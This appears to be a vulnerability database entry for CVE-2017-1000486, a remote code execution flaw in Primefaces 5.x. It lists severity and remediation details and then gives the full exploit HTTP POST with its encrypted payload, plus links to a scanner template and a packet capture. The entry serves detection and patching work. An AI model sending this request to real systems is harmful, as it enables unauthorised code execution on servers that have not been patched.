| Title | Primetek Primefaces 5.x - Remote Code Execution |
|---|---|
| Author | Moritz Nentwig |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. |
| Remediation | Apply the latest security patches or upgrade to a newer version of the Primetek Primefaces application. |
| CVSS Score | 9.8 |
| EPSS Score | 0.94035 |
| CVE ID | CVE-2017-1000486 |
| CWE ID | CWE-326 |
| Tags | cve2017 cve primetek rce injection kev vkev vuln |
Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution.
POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:70.0) Gecko/20100101 Firefox/70.0
Connection: close
Content-Length: 160
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-1000486.yaml
🦈 Packet Capture: ⬇️ Download cve-2017-1000486.pcap
N/AN/A